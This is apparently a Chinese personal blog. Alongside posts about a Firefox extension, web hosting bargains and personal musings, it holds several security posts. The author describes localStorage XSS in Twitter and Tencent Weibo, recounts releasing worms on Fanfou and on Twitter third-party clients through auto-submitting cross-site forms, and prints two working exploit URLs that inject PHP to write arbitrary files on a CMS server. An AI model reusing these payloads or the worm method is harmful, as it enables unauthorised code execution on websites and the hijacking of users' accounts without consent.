localStorage是html5里的一个概念，可以用于浏览器端的本地存储，以domain区分

twitter的localStorage里的内容可以xss，虽然很鸡肋，但很好玩

如果你让我用了你的电脑，我就可以钓鱼盗你的号，泡你的粉丝了……

如果再有个反射xss配合种localStorage，那就无敌了，只要用户点了你的链接后，就等于种下一个存储型的xss了

而且localStorage的优点是比cookie时间长，普通用户还注销不了

可能是html5的东西刚开始流行，程序员们还没重视，基本对localStorage里的内容不加过滤验证就直接在页面使用了

看了下腾讯微博的，也有类似的问题

html5是好东西，程序员和黑客都喜欢

火狐官方上的地址不知道为何不好用了，可能没通过审核

本来也没打算再管了，但微博上有网友要此扩展，所以把扩展传上来了

前段网易微博的页面更新了，所以扩展在网易微博有点问题，此版本也顺便修复了这个问题

新地址在下面：http://lvwei.me/TImgPaste.xpi

先推荐下我一年前做的微博应用，月老爱配对 http://weibo.com/tyuelao 。当时做完后就没管了，没想到竟然在4.19号这天借facebook的光火起来了。因为最近有个新闻说facebook推出了一个叫暗恋的应用，跟我这个功能类似。很多人说我这个应用山寨了facebook。也真有可能是，但我已经记不清了，一年前的事了，太久远了。在这个社会主义初级阶段，崇洋媚外总算是个优点，我也就不是很在意了，逗了他们几下下

最近我算是悟透了一个道理，那就是吃小便宜占大亏

我的这个博客这几天换了个空间，因为vps挂了，还丢了些数据。便宜没好货啊，看来观音姐姐说的是对的。当初买的是15美元一年的nordicvps的128m的vps，当时追求的是性价比。的确性价比还是不错的，哪怕它不保证你数据的安全，自己做好备份，拿来玩还是超级好的。那个vps到现在还没恢复，而且老外的回复也很有意思，说数据恢复不了了，而且这几天复活节他们要休息，等过节了再修。谁让咱用的是便宜货呢，只能等了

买了个一美元三年的无限制的主机套餐，当测试空间是再好不过了。控制面板是cpanel的，cpanel的控制面板添加域名的时候，也可以不用把ns给指过去，只要保证你添加的域名还没有解析就可以了。你可以添完了再解析，若域名是已经解析过的，那就先删掉这个域名的记录。网上的这方面教程太少，走的还都是弯路。

买了个dreamhost的第一年9美元的套餐。结果又是因为贪便宜丢了一个我认为还不错的域名weibojiaoyou.com。我没有在第一时间去godaddy花钱注册，因为dreamhost的套餐里面有个免费域名，所以我就把这个域名绑在dreamhost的套餐上了。结果就是在我等待dreamhost审核的时候，第二天这个域名就被别人注册了，是个中国的域名代理商。这点我也想到过，但侥幸心让我忽略了这点，没想到真的被我碰上了。所以我甚至阴谋的认为，域名代理商和运营商勾结，在监听几个大域名商的注册域名的请求包

因为中国很多人用dreamhost乱搞，所以dreamhost的优惠套餐对中国用户审核很严。我的等了三天还没审核下来，于是我就每天发一封ticket，最后一封很严厉的对他们说，要么通过，要么赶紧退钱，老子是个很穷的中国人。结果竟然顺利通过审核了。可能他们考虑了中国的人权状况，发了善心。

这几天又贪图便宜注册了雅虎的1.99美元优惠域名，结果很快就被删掉了，因为很多中国人用这些优惠域名做垃圾站，然后也不续费。可悲的是域名已经被雅虎注册了，等它那失效还不知道具体是哪天，可能会被别人注册。所以我只能硬着龟皮头再去reactive，交足了全额，不敢再用优惠码，没想到还是删。换成注册两年的，还是删。最后无奈发了个邮件，问他们到底想怎么样，他们说可能是支付的卡出问题了。于是我又改用信用卡直接付费了，不走paypal了。现在还在等消息，又是贪便宜惹的麻烦

我这个蠢货，每天打车上班二三十，出去桌游加打车上百，出去踢球加打车上百，何苦去省那几美元。看来女人购物的愚蠢基因，男人骨子里也有的。大家享受的都是这个解决问题的过程

有域名空间需求的可以找我代购，价格合理，童叟无欺。重要的域名一定要第一时间就去注册，不要贪小便宜

花了两个晚上写的，在windows下预期功能全实现了
支持发微薄时粘贴图片，直接ctrl+v或右键选择“微博图片粘”即可。图片来源可为本地复制，屏幕截图，页面上右键复制的图片等……目前只支持新浪微博

扩展地址在这 https://addons.mozilla.org/zh-CN/firefox/addon/timgpaste/

此扩展火狐那边的地址不知道为什么不好用了，新地址在这 http://lvwei.me/TImgPaste.xpi

update:目前也支持网易微博了~

这个博客在我玩完wordpress后就基本又没更新过了
真的有点愧对这个自己亲手改的完美（虽然别人不承认）的豆瓣风格皮肤了
我很奇怪我都改成豆瓣风格了，为什么还没人来留言要求合体呢
难道豆瓣不是亚洲最大的色情交友中心么，难道小跑和大力是骗我的么
年纪大了，不写诗了，写点别的吧

今年是一个意义重大的一个一年
我突然想到，以我的年纪，经常晚上一次买三根冰棍边走边吃是有点不妥的了
哪怕我小时候一次能吃10根
年纪的量变，逼着我去质变
今年本打算竭力达成一个目标，不料有点变故让这个目标难度大了点
于是我又决定淡定的面对这一切
工作，学习，娱乐，睡觉，踢球，过好每一天

希望膝盖能快点好起来
希望苗苗中考成功
希望家人亲戚都开心顺利
希望中大奖

回到标题的内容
通过直觉找到了腾讯微博一个xss，火狐下无效，其他的好像都可以
没什么好玩的了，先攒着再说

听说国产3D爱情片《肉蒲团》预告片出来了，而且好像还有无码露点镜头
我很愤怒，我不敢相信这是真的，这种预告片要是被青少年看到的话，那毒害得有多大啊
所以我去网上找到了这个预告片，看看到底有没有露点，如果有的话，我一定要把它揪出来
看完后，我震惊了，好像真的有露，但我不知道我判断的是否准确
现在发出来让大家鉴别下，如果真的有露点的话，我们一定要记住这个视频的情节，下次遇到这个视频，坚决不传播
点击这里下载

把新浪博客搬出来了，弄了个独立的，用http://lvwei.me访问

用的是伍德派斯写的程序，主题用的是wlsy的这个主题，感谢他，愿佛祖保佑他平安

自己也改了下css，往豆瓣的风格上靠了靠

用独立博客好处多多，控制自由，没人管得着，访客信息来源清晰，还能装逼，写诗也更有灵感

当然，最重要的原因是我花1.99英镑买了lvwei.me这个域名

花了这么多钱，不弄个博客怪可惜的

刚搭建好，可能还有很多问题

今天测试了一个蠕虫，没干什么坏事
主要在保护蠕虫上下了点功夫
而且还给出了些错误的迷惑代码，能耽误别人修复BUG
果然蠕虫过了几个小时停了后，那个BUG还在，到目前还没被修复
饭否可能也还没发现，因为他们在处理了蠕虫后，却修复了知道创宇前两天公布的一个他们的BUG
那个BUG我也发现了，但看有人公布了，我就没再用了
具体我的保护蠕虫的方法，过两天有时间写一下
关于那个BUG，我也正在联系饭否

一个朋友发来这个漏洞，说是不好利用
漏洞描述给出的例子phpinfo()简直是糊弄人的
我看了下漏洞的代码，试了下，如下方法可以利用，在魔术引号开了的情况下也可

我试出两种方式：
http://www.XXXX.com/member/post.php?only=1&showHtml_Type[bencandy][1]={${$ppp = fopen(‘xixi.php’,'w’) and fwrite($ppp,’test’) and print(’111′) and ($filename_b = stripcslashes($filename_b))}}&aid=1&job=endHTML
这种会执行两次，第二次会成功

http://www.XXXX.com/member/post.php?only=1&showHtml_Type[bencandy][1]={${$ppp = fopen(stripcslashes($_GET[path]),’w') and fwrite($ppp,’hello’) and print(’111′) and ($filename_b = stripcslashes(null))}}&aid=1&job=endHTML&path=./../index1.php
这种只执行一次，不过自己得多写个参数

今天放在国内的twitter客户端上的蠕虫果然也还算猛。不过仅仅是发个推，关注下我，没干别的坏事，但是某些敏感的极端右派还是有很多感觉很受伤，甚至将我描绘成了共产主义的接班人，竟然认为我是公匪派来摧毁所有第三方客户端的，晕死，我又不是奥特曼，我怎么会那么强大。而且在我解释了以后，竟然有人还这么认为，再怎么说我的twitter签名也是个右派的签名啊，而且我基本只玩新浪微博，不玩推特，但还是搭建了个推特中文圈，这是多么雷锋的精神啊，唉，真是为中国的民主化进程感到担忧

twitter的安全的确做的很棒，想在那上面玩跨站基本没戏
但由于国情的原因，国内的twitter用户大多用的都是客户端，所以如果跨了这些客户端，也基本能达到twitter大中华区伪跨站的效果，于是我看了下用的最广的推特中文圈的代码，有些反射的xss，但总感觉用的会不爽，因为推特客户端种类很多，我不至于每个都去找XSS啊，于是想到了最原始的远程form提交，试了下，果然没做http referer判断，再看下别的客户端，果然也没有限制，基本上可以搞定大部分的客户端了

很快一个思路就有了，原理很简单，技术超简单。建一个页面a.php，放个美女图片，再iframe几个自动提交表单的页面b.php，c.php,因为不同的客户端提交地址会不同，我只加了两种，不过好像可以囊括大部分种类的客户端，a.php把http referer中的蠕虫所在网站的地址传给b.php,c.php，b.php,c.php再去自动提交发布推特，里面包含着随机的诱惑性话语和一个链接地址

然后我再亲自亲手在客户端里点下链接，诱惑性话语就发到自己的推特上了，基本上受过9年制义务教育的男女人看到后都会去点，然后就……，这样就可以跨好多站了，这种情况也就是在客户端这种应用上可以出现

很多半瓶子醋的人看到了我记录了客户端的地址，就说我是在收集第三方推特站的地址然后上交给国务院，心理真够阴暗的，希望你现在能看懂我为什么要记地址了